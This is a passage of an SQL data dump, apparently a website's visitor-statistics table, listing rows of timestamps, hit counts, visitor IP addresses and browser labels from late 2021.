66.87',''),(560069,1636977912,1,1,0,0,'113.96.250.18','chrome'),(560070,1636985045,1,1,0,0,'113.96.250.18','chrome'),(560071,1637010498,1,0,1,0,'66.249.66.87',''),(560072,1637017139,1,1,0,0,'113.96.250.18','msie'),(560073,1637022998,2,2,0,0,'113.96.250.18','chrome'),(560074,1637037831,1,1,0,0,'113.96.250.18','other'),(560075,1637039799,1,1,0,0,'31.13.103.14','other'),(560076,1637049572,2,2,0,0,'113.96.250.18','other'),(560077,1637050226,1,1,0,0,'113.96.250.18','chrome'),(560078,1637051494,1,1,0,0,'113.96.250.18','other'),(560079,1637051896,1,0,1,0,'66.249.66.85',''),(560080,1637071527,1,1,0,0,'113.96.250.18','chrome'),(560081,1637073278,1,1,0,0,'194.156.95.227','other'),(560082,1637073279,1,1,0,0,'194.156.95.227','chrome'),(560083,1637075753,2,2,0,0,'194.156.95.218','other'),(560084,1637093523,1,1,0,0,'66.249.66.85','chrome'),(560085,1637095016,2,2,0,0,'40.114.121.215','firefox'),(560086,1637095257,1,0,1,0,'66.249.66.159',''),(560087,1637097288,1,1,0,0,'173.252.111.24','other'),(560088,1637097395,1,1,0,0,'66.249.66.201','chrome'),(560089,1637101220,2,2,0,0,'149.129.167.106','firefox'),(560091,1637101440,1,1,0,0,'173.252.111.5','other'),(560092,1637101441,1,1,0,0,'173.252.111.112','other'),(560093,1637102427,1,1,0,0,'66.249.66.199','chrome'),(560094,1637105361,1,1,0,0,'66.249.66.9','chrome'),(560095,1637105837,1,1,0,0,'66.249.66.85','chrome'),(560096,1637110225,1,0,1,0,'66.249.66.87',''),(560097,1637110657,1,1,0,0,'113.96.250.18','chrome'),(560098,1637112315,1,1,0,0,'113.96.250.18','other'),(560099,1637113927,1,1,0,0,'113.96.250.18','firefox'),(560100,1637114527,1,0,1,0,'66.249.66.85',''),(560101,1637115428,2,2,0,0,'113.96.250.18','other'),(560102,1637118911,1,1,0,0,'23.228.109.147','other'),(560103,1637122105,1,1,0,0,'113.96.250.18','other'),(560104,1637123379,2,2,0,0,'113.96.250.18','chrome'),(560105,1637123449,1,1,0,0,'69.197.185.43','chrome'),(560106,1637124911,2,2,0,0,'40.114.121.215','firefox'),(560107,1637136895,2,2,0,0,'66.249.66.86','chrome'),(560108,1637138057,1,0,1,0,'66.249.66.85',''),(560109,1637139600,1,1,0,0,'52.16.91.121','other'),(560110,1637141434,1,1,0,0,'66.249.66.87','chrome'),(560111,1637141624,1,1,0,0,'147.139.136.124','firefox'),(560112,1637144241,1,0,1,0,'66.249.66.87',''),(560113,1637144989,1,0,1,0,'66.249.66.85',''),(560114,1637148635,1,1,0,0,'66.249.66.87','chrome'),(560115,1637159387,1,0,1,0,'66.249.66.85',''),(560116,1637163115,1,1,0,0,'66.249.66.85','chrome'),(560117,1637167477,3,3,0,0,'113.96.250.18','chrome'),(560118,1637169077,1,0,1,0,'66.249.66.5',''),(560119,1637169326,1,1,0,0,'66.249.66.199','chrome'),(560120,1637173603,1,1,0,0,'66.249.66.5','chrome'),(560121,1637174742,1,1,0,0,'113.96.250.18','chrome'),(560122,1637175060,1,0,1,0,'66.249.66.9',''),(560123,1637178637,1,1,0,0,'91.196.178.33','chrome'),(560124,1637179103,1,1,0,0,'113.96.250.18','chrome'),(560125,1637185485,1,1,0,0,'66.249.66.158','chrome'),(560126,1637186915,1,1,0,0,'66.249.66.9','chrome'),(560127,1637192593,1,1,0,0,'113.96.250.18','firefox'),(560128,1637209319,1,1,0,0,'37.140.198.119','other'),(560129,1637209320,1,1,0,0,'37.140.198.119','chrome'),(560130,1637212678,1,1,0,0,'87.250.224.40','other'),(560131,1637216740,1,1,0,0,'66.249.66.86','chrome'),(560132,1637216833,3,3,0,0,'113.96.250.18','chrome'),(560133,1637221815,1,1,0,0,'47.114.3.188','firefox'),(560134,1637226172,1,0,1,0,'66.249.66.86',''),(560135,1637227466,1,1,0,0,'52.53.247.167','chrome'),(560136,1637228877,1,1,0,0,'113.96.250.18','other'),(560137,1637230000,1,1,0,0,'185.237.217.7','firefox'),(560138,1637236660,2,2,0,0,'113.96.250.18','chrome'),(560139,1637239513,1,1,0,0,'113.96.250.18','other'),(560140,1637244119,2,2,0,0,'113.96.250.18','chrome'),(560141,1637245820,1,1,0,0,'31.13.127.1','other'),(560142,1637252821,2,2,0,0,'113.96.250.18','chrome'),(560143,1637254448,1,1,0,0,'157.55.39.62','other'),(560144,1637256547,1,1,0,0,'5.255.253.153','other'),(560145,1637273172,1,1,0,0,'31.13.103.14','other'),(560146,1637273173,1,1,0,0,'31.13.103.2','other'),(560147,1637276621,1,1,0,0,'66.249.66.199','chrome'),(560148,1637283276,1,1,0,0,'113.96.250.18','chrome'),(560149,1637289714,1,1,0,0,'113.96.250.18','chrome'),(560150,1637290132,1,1,0,0,'113.96.250.18','other'),(560151,1637297643,1,1,0,0,'113.96.250.18','chrome'),(560152,1637301104,1,1,0,0,'173.252.79.16','other'),(560153,1637308549,2,2,0,0,'54.203.73.198','firefox'),(560154,1637308782,1,1,0,0,'66.249.66.85','chrome'),(560155,1637311193,1,1,0,0,'113.96.250.18','chrome'),(560156,1637312692,1,0,1,0,'66.249.66.86',''),(560157,1637315339,1,1,0,0,'113.96.250.18','chrome'),(560158,1637323490,2,2,0,0,'113.96.250.18','firefox'),(560159,1637328585,2,2,0,0,'113.96.250.18','firefox'),(560160,1637333473,1,1,0,0,'23.146.241.19','firefox'),(560161,1637339078,2,2,0,0,'113.96.250.18','chrome'),(560162,1637352218,1,1,0,0,'66.249.66.7','chrome'),(560163,1637358134,1,1,0,0,'45.129.18.154','chrome'),(560164,1637358135,1,1,0,0,'45.129.18.215','chrome'),(560165,1637362436,1,1,0,0,'113.96.250.18','firefox'),(560166,1637368080,1,1,0,0,'113.96.250.18','firefox'),(560167,1637370931,4,4,0,0,'159.223.51.44','chrome'),(560168,1637382656,1,1,0,0,'113.96.250.18','firefox'),(560169,1637386466,1,1,0,0,'113.96.250.18','chrome'),(560170,1637394828,1,1,0,0,'113.96.250.18','chrome'),(560171,1637400551,1,0,1,0,'66.249.66.85',''),(560172,1637401573,1,1,0,0,'31.13.115.119','other'),(560173,1637405069,1,1,0,0,'64.246.165.180','firefox'),(560174,1637405273,1,1,0,0,'113.96.250.18','other'),(560175,1637407087,1,1,0,0,'5.45.207.126','other'),(560176,1637407949,1,0,1,0,'66.249.66.85',''),(560177,1637407950,2,2,0,0,'113.96.250.18','chrome'),(560178,1637409065,1,1,0,0,'113.96.250.18','chrome'),(560179,1637417517,1,1,0,0,'113.96.250.18','other'),(560180,1637420624,1,0,1,0,'66.249.66.9',''),(560181,1637420877,1,1,0,0,'66.249.66.158','chrome'),(560182,1637426275,1,0,1,0,'66.249.66.199',''),(560183,1637429645,1,1,0,0,'217.196.161.45','chrome'),(560184,1637429821,1,1,0,0,'113.96.250.18','chrome'),(560185,1637437609,1,1,0,0,'5.255.253.166','other'),(560186,1637437912,1,1,0,0,'5.253.204.8','chrome'),(560187,1637444237,1,1,0,0,'66.249.66.197','chrome'),(560188,1637447607,1,1,0,0,'113.96.250.18','chrome'),(560189,1637448820,1,1,0,0,'113.96.250.18','firefox'),(560190,1637454292,1,1,0,0,'5.255.253.119','other'),(560191,1637457055,1,1,0,0,'113.96.250.18','other'),(560192,1637457897,1,1,0,0,'113.96.250.18','chrome'),(560193,1637480670,1,1,0,0,'113.96.250.18','other'),(560194,1637485387,1,1,0,0,'66.249.66.87','chrome'),(560195,1637486254,1,0,1,0,'66.249.66.86',''),(560196,1637488524,1,1,0,0,'113.96.250.18','chrome'),(560197,1637493423,1,1,0,0,'34.243.70.165','other'),(560198,1637494345,1,1,0,0,'66.249.66.86','chrome'),(560199,1637495978,1,1,0,0,'173.252.87.3','other'),(560200,1637503802,1,1,0,0,'31.13.127.20','other'),(560202,1637511849,1,1,0,0,'113.96.250.18','other'),(560203,1637512669,1,1,0,0,'66.249.66.129','chrome'),(560204,1637515626,1,1,0,0,'91.196.178.206','chrome'),(560205,1637518950,1,1,0,0,'113.96.250.18','other'),(560206,1637522452,1,1,0,0,'66.249.66.199','chrome'),(560207,1637525766,1,1,0,0,'157.55.39.225','other'),(560208,1637531003,1,1,0,0,'113.96.250.18','msie'),(560209,1637539836,1,1,0,0,'69.197.185.43','chrome'),(560210,1637541130,1,1,0,0,'113.96.250.18','chrome'),(560211,1637561350,1,1,0,0,'113.96.250.18','chrome'),(560212,1637562384,1,1,0,0,'31.13.127.35','other'),(560213,1637564378,1,1,0,0,'113.96.250.18','opera'),(560214,1637572121,1,0,1,0,'66.249.66.86',''),(560215,1637574183,1,1,0,0,'113.96.250.18','chrome'),(560216,1637575659,1,1,0,0,'185.165.118.46','firefox'),(560217,1637578051,1,0,1,0,'113.96.250.18',''),(560218,1637580279,1,1,0,0,'113.96.250.18','other'),(560219,1637593083,1,0,1,0,'113.96.250.18',''),(560220,1637601107,2,2,0,0,'85.214.113.75','chrome'),(560221,1637603833,1,1,0,0,'113.96.250.18','firefox'),(560222,1637614449,1,1,0,0,'217.196.161.126','chrome'),(560223,1637620136,1,1,0,0,'113.96.250.18','chrome'),(560224,1637626440,1,1,0,0,'31.13.103.116','other'),(560225,1637626441,1,1,0,0,'31.13.103.120','other'),(560226,1637629235,5,5,0,0,'3.144.30.22','chrome'),(560227,1637647013,1,1,0,0,'113.96.250.18','other'),(560228,1637652913,1,1,0,0,'66.249.66.87','chrome'),(560229,1637655597,1,1,0,0,'113.96.250.18','chrome'),(560230,1637657319,1,1,0,0,'113.96.250.18','msie'),(560231,1637658432,1,0,1,0,'66.249.66.85',''),(560232,1637660172,1,1,0,0,'113.96.250.18','chrome'),(560233,1637662399,1,1,0,0,'113.96.250.18','chrome'),(560234,1637666541,1,1,0,0,'205.185.117.203','chrome'),(560235,1637666545,1,1,0,0,'209.141.35.128','chrome'),(560236,1637669735,1,1,0,0,'113.96.250.18','opera'),(560237,1637670588,2,2,0,0,'113.96.250.18','firefox'),(560238,1637675887,1,1,0,0,'113.96.250.18','firefox'),(560239,1637687653,1,1,0,0,'77.88.5.6','other'),(560240,1637696880,1,1,0,0,'113.96.250.18','firefox'),(560241,1637699040,1,1,0,0,'113.96.250.18','other'),(560242,1637708325,1,1,0,0,'113.96.250.18','chrome'),(560243,1637708496,1,1,0,0,'66.249.66.86','chrome'),(560244,1637710029,1,1,0,0,'66.249.66.87','chrome'),(560245,1637710248,1,1,0,0,'52.34.241.218','firefox'),(560246,1637715678,1,1,0,0,'113.96.250.18','chrome'),(560247,1637723387,1,1,0,0,'113.96.250.18','chrome'),(560248,1637723780,1,1,0,0,'113.96.250.18','other'),(560249,1637725224,1,1,0,0,'113.96.250.18','chrome'),(560250,1637726566,1,1,0,0,'113.96.250.18','chrome'),(560251,1637727380,1,1,0,0,'66.249.66.7','chrome'),(560252,1637727623,1,1,0,0,'77.88.5.6','other'),(560253,1637729021,1,1,0,0,'66.249.66.197','chrome'),(560254,1637730058,1,1,0,0,'113.96.250.18','other'),(560255,1637744363,2,2,0,0,'113.96.250.18','chrome'),(560256,1637748337,1,1,0,0,'113.96.250.18','chrome'),(560257,1637749823,1,0,1,0,'66.249.66.199',''),(560258,1637751131,1,1,0,0,'23.228.109.147','other'),(560259,1637762463,1,1,0,0,'113.96.250.18','chrome'),(560260,1637770269,1,1,0,0,'113.96.250.18','firefox'),(560261,1637772748,1,1,0,0,'93.158.161.6','other'),(560262,1637772762,1,1,0,0,'77.88.5.6','other'),(560263,1637773024,1,1,0,0,'77.88.5.6','chrome'),(560264,1637781786,1,1,0,0,'113.96.250.18','chrome'),(560265,1637785052,2,2,0,0,'113.96.250.18','chrome'),(560266,1637800046,1,1,0,0,'113.96.250.18','chrome'),(560267,1637802793,1,1,0,0,'113.96.250.18','chrome'),(560268,1637814287,3,3,0,0,'51.91.123.235','firefox'),(560269,1637831371,1,1,0,0,'66.249.66.85','chrome'),(560270,1637834617,2,1,1,0,'66.249.66.87',''),(560271,1637843638,1,1,0,0,'31.13.127.23','other'),(560272,1637843639,1,1,0,0,'31.13.127.21','other'),(560273,1637843761,1,1,0,0,'31.13.127.111','other'),(560274,1637843762,1,1,0,0,'31.13.127.41','other'),(560275,1637857269,1,1,0,0,'66.249.70.41','chrome'),(560276,1637866894,1,1,0,0,'31.13.103.6','other'),(560277,1637866895,1,1,0,0,'31.13.103.1','other'),(560278,1637870050,1,1,0,0,'51.158.98.24','other'),(560279,1637876705,1,1,0,0,'157.55.39.180','other'),(560280,1637876827,1,1,0,0,'157.55.39.174','other'),(560281,1637881409,1,1,0,0,'51.158.98.24','other'),(560282,1637891240,1,1,0,0,'66.249.70.39','chrome'),(560283,1637892944,1,1,0,0,'66.249.70.39','chrome'),(560284,1637899332,1,1,0,0,'23.228.109.147','other'),(560285,1637899968,1,1,0,0,'157.55.39.156','other'),(560286,1637900468,1,1,0,0,'66.249.70.41','chrome'),(560287,1637906119,3,3,0,0,'185.49.20.77','firefox'),(560288,1637906532,1,1,0,0,'77.88.5.6','other'),(560289,1637909046,1,1,0,0,'66.249.70.41','chrome'),(560290,1637911912,1,0,1,0,'66.249.70.41',''),(560291,1637912954,1,1,0,0,'66.249.70.37','chrome'),(560292,1637915360,1,1,0,0,'157.55.39.180','other'),(560293,1637922428,1,0,1,0,'66.249.70.41',''),(560294,1637925705,1,1,0,0,'77.88.5.6','other'),(560295,1637927876,1,1,0,0,'66.249.70.39','chrome'),(560296,1637932766,1,1,0,0,'205.185.122.184','chrome'),(560297,1637932768,1,1,0,0,'209.141.36.231','chrome'),(560298,1637934794,1,1,0,0,'66.249.70.41','chrome'),(560299,1637939716,1,1,0,0,'157.55.39.156','other'),(560300,1637943325,1,1,0,0,'157.55.39.180','other'),(560301,1637973750,4,4,0,0,'109.70.111.112','chrome'),(560302,1637983328,1,1,0,0,'157.55.39.180','other'),(560303,1637986018,1,1,0,0,'168.119.183.30','chrome'),(560304,1637990077,1,1,0,0,'157.55.39.180','other'),(560305,1638000104,1,1,0,0,'66.249.70.37','chrome'),(560306,1638008515,1,0,1,0,'66.249.70.39',''),(560307,1638020279,1,1,0,0,'194.5.175.215','firefox'),(560308,1638024090,1,1,0,0,'66.249.70.39','chrome'),(560309,1638024463,1,1,0,0,'23.228.109.147','other'),(560310,1638029778,1,1,0,0,'66.249.70.39','chrome'),(560311,1638030769,1,0,1,0,'66.249.70.37',''),(560312,1638046983,1,1,0,0,'103.114.158.1','chrome'),(560313,1638046987,1,1,0,0,'205.185.116.25','chrome'),(560314,1638049835,26,26,0,0,'192.3.199.147','chrome'),(560315,1638061848,1,1,0,0,'66.249.70.39','chrome'),(560316,1638066026,1,1,0,0,'77.88.5.6','other'),(560317,1638075267,1,0,1,0,'66.249.70.37',''),(560318,1638076246,1,1,0,0,'157.55.39.156','other'),(560319,1638085297,1,1,0,0,'66.249.70.41','chrome'),(560320,1638094831,1,0,1,0,'66.249.70.37',''),(560321,1638095801,1,1,0,0,'66.249.70.41','chrome'),(560322,1638100167,1,1,0,0,'157.55.39.180','other'),(560323,1638101412,2,2,0,0,'31.13.127.118','other'),(560324,1638105275,1,1,0,0,'46.211.82.216','chrome'),(560325,1638105631,1,1,0,0,'47.107.33.26','firefox'),(560326,1638118642,1,1,0,0,'157.55.39.180','other'),(560327,1638137066,1,1,0,0,'157.55.39.180','other'),(560328,1638150229,1,0,1,0,'66.249.70.37',''),(560329,1638155536,1,1,0,0,'157.55.39.180','other'),(560330,1638164884,1,1,0,0,'23.228.109.147','other'),(560331,1638166805,1,1,0,0,'113.96.250.18','chrome'),(560332,1638174019,1,1,0,0,'157.55.39.180','other'),(560333,1638178022,1,1,0,0,'113.96.250.18','firefox'),(560334,1638182528,1,0,1,0,'66.249.70.41',''),(560335,1638184939,1,1,0,0,'23.228.109.147','other'),(560336,1638187646,1,1,0,0,'66.249.70.37','chrome'),(560337,1638189860,1,1,0,0,'157.55.39.180','other'),(560338,1638195290,1,1,0,0,'113.96.250.18','chrome'),(560339,1638199421,1,1,0,0,'69.197.185.45','chrome'),(560340,1638203284,1,1,0,0,'66.249.70.39','chrome'),(560341,1638208505,1,1,0,0,'157.55.39.180','other'),(560342,1638209093,1,1,0,0,'113.96.250.18','other'),(560343,1638211576,1,1,0,0,'173.252.111.13','other'),(560344,1638212099,1,1,0,0,'113.96.250.18','other'),(560345,1638212296,1,1,0,0,'157.55.39.180','other'),(560346,1638215538,1,1,0,0,'113.96.250.18','other'),(560347,1638219011,1,1,0,0,'77.88.5.22','other'),(560348,1638219015,1,1,0,0,'77.88.5.232','chrome'),(560349,1638224269,2,2,0,0,'113.96.250.18','other'),(560350,1638227063,1,1,0,0,'157.55.39.180','other'),(560351,1638231108,1,1,0,0,'109.70.106.130','other'),(560352,1638238906,1,1,0,0,'113.96.250.18','chrome'),(560353,1638240220,1,1,0,0,'66.249.70.41','chrome'),(560354,1638244204,2,2,0,0,'54.158.30.170','firefox'),(560355,1638245691,1,1,0,0,'157.55.39.180','other'),(560356,1638250665,1,1,0,0,'113.96.250.18','other'),(560357,1638255057,1,1,0,0,'54.226.47.227','chrome'),(560358,1638256224,1,1,0,0,'66.249.70.39','chrome'),(560359,1638257179,1,1,0,0,'18.206.45.22','other'),(560360,1638257290,1,1,0,0,'66.249.70.39','chrome'),(560361,1638258608,1,1,0,0,'113.96.250.18','chrome'),(560362,1638260634,2,2,0,0,'173.230.129.142','other'),(560363,1638264303,1,1,0,0,'157.55.39.180','other'),(560364,1638268593,1,1,0,0,'173.252.79.116','other'),(560365,1638268929,1,0,1,0,'66.249.70.37',''),(560366,1638273284,1,1,0,0,'113.96.250.18','other'),(560367,1638273716,1,1,0,0,'113.96.250.18','chrome'),(560368,1638274626,1,1,0,0,'113.96.250.18','chrome'),(560369,1638283011,1,1,0,0,'157.55.39.180','other'),(560370,1638284487,1,1,0,0,'66.249.70.39','chrome'),(560371,1638290191,1,0,1,0,'66.249.70.39',''),(560372,1638292769,1,1,0,0,'113.96.250.18','chrome'),(560373,1638298092,1,1,0,0,'137.184.156.246','chrome'),(560374,1638303431,1,1,0,0,'113.96.250.18','other'),(560375,1638305066,1,1,0,0,'113.96.250.18','opera'),(560376,1638309804,1,1,0,0,'54.166.53.213','chrome'),(560377,1638311360,1,1,0,0,'3.86.94.70','other'),(560378,1638316485,1,1,0,0,'113.96.250.18','chrome'),(560379,1638317772,1,1,0,0,'77.88.5.6','other'),(560380,1638318381,1,1,0,0,'157.55.39.180','other'),(560381,1638331540,1,1,0,0,'103.111.30.40','firefox'),(560382,1638333214,1,1,0,0,'157.55.39.180','other'),(560383,1638340272,1,1,0,0,'66.249.70.37','chrome'),(560384,1638346153,1,1,0,0,'113.96.250.18','chrome'),(560385,1638354279,1,1,0,0,'113.96.250.18','chrome'),(560386,1638355337,1,0,1,0,'66.249.70.39',''),(560387,1638356806,1,1,0,0,'113.96.250.18','chrome'),(560388,1638365911,1,1,0,0,'66.249.64.19','chrome'),(560389,1638368770,1,0,1,0,'66.249.64.19',''),(560390,1638370932,1,1,0,0,'157.55.39.180','other'),(560391,1638372970,1,1,0,0,'91.196.178.169','chrome'),(560392,1638380958,1,1,0,0,'113.96.250.18','chrome'),(560393,1638381800,1,1,0,0,'113.96.250.18','other'),(560394,1638381802,1,1,0,0,'23.228.109.147','other'),(560395,1638386680,1,1,0,0,'107.150.63.173','chrome'),(560396,1638403090,1,1,0,0,'207.46.13.99','other'),(560397,1638406096,1,1,0,0,'77.88.5.13','chrome'),(560398,1638415999,1,1,0,0,'159.203.108.169','other'),(560399,1638420958,1,1,0,0,'113.96.250.18','chrome'),(560400,1638426639,1,1,0,0,'113.96.250.18','chrome'),(560401,1638427200,26,26,0,0,'23.95.227.11','chrome'),(560402,1638436515,1,1,0,0,'113.96.250.18','chrome'),(560403,1638438999,1,1,0,0,'49.12.225.174','other'),(560404,1638441751,1,0,1,0,'66.249.64.20',''),(560405,1638446785,1,1,0,0,'66.249.64.20','chrome'),(560406,1638458353,1,1,0,0,'157.55.39.180','other'),(560407,1638461203,1,1,0,0,'91.196.178.209','chrome'),(560408,1638469908,1,1,0,0,'113.96.250.18','firefox'),(560409,1638475548,1,1,0,0,'51.158.108.77','other'),(560410,1638475601,2,2,0,0,'173.252.111.26','other'),(560411,1638475602,2,2,0,0,'173.252.111.23','other'),(560416,1638478703,1,1,0,0,'113.96.250.18','other'),(560417,1638478823,4,4,0,0,'173.252.111.24','other'),(560418,1638478827,2,2,0,0,'173.252.111.18','other'),(560419,1638478828,2,2,0,0,'173.252.111.14','other'),(560422,1638480842,11,11,0,0,'77.88.5.6','other'),(560423,1638480850,1,1,0,0,'77.88.5.6','chrome'),(560424,1638485993,1,1,0,0,'113.96.250.18','chrome'),(560425,1638488405,1,1,0,0,'157.55.39.108','other'),(560426,1638490963,1,1,0,0,'157.55.39.180','other'),(560427,1638495333,3,3,0,0,'113.96.250.18','chrome'),(560428,1638505177,1,1,0,0,'113.96.250.18','chrome'),(560429,1638507411,1,1,0,0,'31.13.103.116','other'),(560430,1638508491,1,1,0,0,'157.55.39.180','other'),(560431,1638514274,1,1,0,0,'113.96.250.18','chrome'),(560432,1638514844,1,1,0,0,'93.158.161.47','other'),(560433,1638521217,1,1,0,0,'205.185.122.184','chrome'),(560434,1638521219,1,1,0,0,'103.114.158.1','chrome'),(560435,1638527012,1,1,0,0,'157.55.39.180','other'),(560436,1638527564,1,1,0,0,'113.96.250.18','other'),(560437,1638539033,1,0,1,0,'66.249.64.18',''),(560438,1638545487,1,1,0,0,'157.55.39.180','other'),(560439,1638550250,2,2,0,0,'173.252.111.19','other'),(560440,1638551868,1,1,0,0,'66.249.64.19','chrome'),(560441,1638553351,1,1,0,0,'66.249.64.19','chrome'),(560442,1638564282,1,1,0,0,'89.108.79.226','firefox'),(560443,1638564283,1,1,0,0,'89.108.79.226','chrome'),(560444,1638566332,1,1,0,0,'157.55.39.180','other'),(560445,1638570651,1,1,0,0,'113.96.250.18','other'),(560446,1638584842,1,1,0,0,'157.55.39.180','other'),(560447,1638587689,11,11,0,0,'3.95.161.94','chrome'),(560448,1638591577,1,1,0,0,'113.96.250.18','chrome'),(560449,1638595415,1,1,0,0,'113.96.250.18','chrome'),(560450,1638596860,3,3,0,0,'192.81.214.168','firefox'),(560451,1638600961,1,1,0,0,'113.96.250.18','chrome'),(560452,1638602657,1,1,0,0,'113.96.250.18','chrome'),(560453,1638603377,1,1,0,0,'157.55.39.180','other'),(560454,1638606765,1,1,0,0,'113.96.250.18','chrome'),(560455,1638607301,1,1,0,0,'66.249.89.19','chrome'),(560456,1638611337,1,1,0,0,'51.158.108.61','other'),(560457,1638618215,1,1,0,0,'23.228.109.147','other'),(560458,1638621953,1,1,0,0,'157.55.39.180','other'),(560459,1638624796,2,2,0,0,'113.96.250.18','other'),(560460,1638624894,1,1,0,0,'23.228.109.147','other'),(560461,1638625390,1,0,1,0,'66.249.64.18',''),(560462,1638628627,1,1,0,0,'113.96.250.18','msie'),(560463,1638640455,1,1,0,0,'157.55.39.180','other'),(560464,1638643333,1,1,0,0,'182.254.234.148','firefox'),(560465,1638649773,1,1,0,0,'173.252.111.10','other'),(560466,1638649774,1,1,0,0,'173.252.111.1','other'),(560467,1638651207,1,1,0,0,'113.96.250.18','chrome'),(560468,1638653102,1,1,0,0,'157.55.39.180','other'),(560469,1638671684,1,1,0,0,'157.55.39.180','other'),(560470,1638681047,1,1,0,0,'66.249.64.18','chrome'),(560471,1638682419,1,1,0,0,'113.96.250.18','other'),(560472,1638683993,1,1,0,0,'113.96.250.18','chrome'),(560473,1638684202,1,1,0,0,'54.69.81.26','firefox'),(560474,1638684583,1,1,0,0,'113.96.250.18','other'),(560475,1638684961,1,1,0,0,'128.199.100.254','chrome'),(560476,1638685514,1,1,0,0,'113.96.250.18','other'),(560477,1638690251,1,1,0,0,'157.55.39.180','other'),(560478,1638693456,1,0,1,0,'66.249.64.19',''),(560479,1638693904,1,1,0,0,'69.171.249.21','other'),(560480,1638700242,5,5,0,0,'35.188.63.26','chrome'),(560481,1638701237,1,1,0,0,'66.249.64.19','chrome'),(560482,1638708779,1,1,0,0,'157.55.39.180','other'),(560483,1638709227,1,1,0,0,'107.150.63.170','chrome'),(560484,1638710305,2,2,0,0,'113.96.250.18','other'),(560485,1638711795,1,0,1,0,'66.249.64.20',''),(560486,1638711799,1,0,1,0,'66.249.64.19',''),(560487,1638718237,1,1,0,0,'113.96.250.18','other'),(560488,1638726397,1,1,0,0,'113.96.250.18','other'),(560489,1638727102,1,1,0,0,'66.249.64.20','chrome'),(560490,1638728234,1,0,1,0,'66.249.64.19',''),(560491,1638731290,1,1,0,0,'113.96.250.18','chrome'),(560492,1638743843,1,1,0,0,'91.208.197.96','firefox'),(560493,1638749417,1,1,0,0,'113.96.250.18','other'),(560494,1638754841,46,46,0,0,'51.89.204.20','chrome'),(560495,1638758368,2,2,0,0,'23.228.109.147','other'),(560496,1638767746,1,1,0,0,'52.183.0.37','chrome'),(560497,1638768286,1,1,0,0,'113.96.250.18','chrome'),(560498,1638777895,1,1,0,0,'113.96.250.18','chrome'),(560499,1638788912,1,1,0,0,'113.96.250.18','other'),(560500,1638794964,1,1,0,0,'34.125.54.204','firefox'),(560501,1638796435,1,1,0,0,'113.96.250.18','chrome'),(560502,1638798155,3,3,0,0,'93.158.161.66','other'),(560503,1638798189,7,7,0,0,'77.88.5.6','other'),(560504,1638798196,6,6,0,0,'93.158.161.6','other'),(560505,1638798197,1,0,1,0,'66.249.64.18',''),(560506,1638798201,1,1,0,0,'77.88.5.6','chrome'),(560507,1638798457,2,2,0,0,'113.96.250.18','chrome'),(560508,1638798517,1,1,0,0,'157.55.39.180','other'),(560509,1638804743,1,1,0,0,'157.55.39.229','other'),(560510,1638806605,1,1,0,0,'93.158.161.60','other'),(560511,1638819429,1,1,0,0,'92.118.160.57','other'),(560512,1638822728,1,1,0,0,'77.88.5.132','chrome'),(560513,1638831010,1,1,0,0,'155.94.222.11','chrome'),(560514,1638836346,1,1,0,0,'157.55.39.156','other'),(560515,1638841482,1,1,0,0,'165.227.220.94','other'),(560516,1638843738,1,1,0,0,'35.247.167.132','chrome'),(560517,1638843820,1,1,0,0,'92.118.160.61','other'),(560518,1638846708,1,1,0,0,'159.203.161.89','other'),(560519,1638849977,11,11,0,0,'141.95.100.175','chrome'),(560520,1638850819,1,1,0,0,'157.55.39.229','other'),(560521,1638851807,1,1,0,0,'45.129.18.59','chrome'),(560522,1638873994,1,1,0,0,'18.232.124.128','other'),(560523,1638874014,1,1,0,0,'31.13.127.9','other'),(560524,1638874015,1,1,0,0,'31.13.127.30','other'),(560525,1638883935,1,1,0,0,'93.158.161.51','other'),(560526,1638884680,1,0,1,0,'66.249.66.86',''),(560527,1638894752,1,1,0,0,'69.197.185.45','chrome'),(560528,1638897075,1,1,0,0,'31.13.103.7','other'),(560529,1638897345,1,1,0,0,'151.35.178.18','chrome'),(560530,1638916081,4,4,0,0,'103.148.157.206','firefox'),(560531,1638920787,1,0,1,0,'66.249.66.199',''),(560532,1638926267,26,26,0,0,'192.3.199.147','chrome'),(560533,1638927597,2,2,0,0,'209.141.41.193','chrome'),(560534,1638932139,1,1,0,0,'46.211.1.156','chrome'),(560535,1638935644,1,0,1,0,'66.249.66.201',''),(560536,1638939161,1,1,0,0,'173.252.107.23','other'),(560537,1638939162,1,1,0,0,'173.252.107.22','other'),(560538,1638948648,1,1,0,0,'93.158.161.34','other'),(560539,1638948651,1,1,0,0,'77.88.5.84','other'),(560540,1638948654,1,1,0,0,'93.158.161.60','other'),(560541,1638948656,6,6,0,0,'77.88.5.6','other'),(560542,1638948659,3,3,0,0,'93.158.161.6','other'),(560543,1638948662,1,1,0,0,'93.158.161.66','other'),(560544,1638948665,1,1,0,0,'93.158.161.71','other'),(560545,1638948667,1,1,0,0,'77.88.5.28','chrome'),(560546,1638948670,1,1,0,0,'77.88.5.6','chrome'),(560547,1638948672,1,1,0,0,'77.88.5.246','other'),(560548,1638948674,1,1,0,0,'93.158.161.58','other'),(560549,1638948678,1,1,0,0,'93.158.161.47','other'),(560550,1638951342,2,2,0,0,'77.87.41.23','chrome'),(560551,1638954831,1,1,0,0,'31.13.103.12','other'),(560552,1638954832,1,1,0,0,'31.13.103.10','other'),(560553,1638955030,1,1,0,0,'31.13.103.117','other'),(560554,1638955031,2,2,0,0,'31.13.103.17','other'),(560555,1638955721,1,1,0,0,'31.13.103.112','other'),(560557,1638961112,1,1,0,0,'23.228.109.147','other'),(560558,1638972797,1,0,1,0,'66.249.64.18',''),(560559,1638974022,1,1,0,0,'157.55.39.180','other'),(560560,1638977592,1,1,0,0,'31.41.51.90','chrome'),(560561,1638991207,1,1,0,0,'66.249.64.20','chrome'),(560562,1638998105,1,1,0,0,'77.88.5.6','other'),(560563,1638999324,1,1,0,0,'93.158.161.44','other'),(560564,1638999327,1,1,0,0,'77.88.5.28','other'),(560565,1638999329,1,1,0,0,'77.88.5.22','other'),(560566,1639013293,1,1,0,0,'66.249.64.18','chrome'),(560567,1639014106,1,1,0,0,'13.233.192.208','chrome'),(560568,1639016462,3,3,0,0,'103.50.76.37','firefox'),(560569,1639017001,2,2,0,0,'23.228.109.147','other'),(560570,1639019019,1,0,1,0,'66.249.64.20',''),(560571,1639020011,19,19,0,0,'77.88.5.6','other'),(560572,1639020043,1,1,0,0,'77.88.5.6','chrome'),(560573,1639020080,12,12,0,0,'93.158.161.6','other'),(560574,1639023241,2,2,0,0,'23.228.109.147','other'),(560575,1639028475,1,1,0,0,'66.249.64.19','chrome'),(560576,1639033432,1,1,0,0,'66.249.64.20','chrome'),(560577,1639035366,1,1,0,0,'176.96.136.51','firefox'),(560578,1639036938,1,0,1,0,'66.249.64.20',''),(560579,1639038807,1,1,0,0,'66.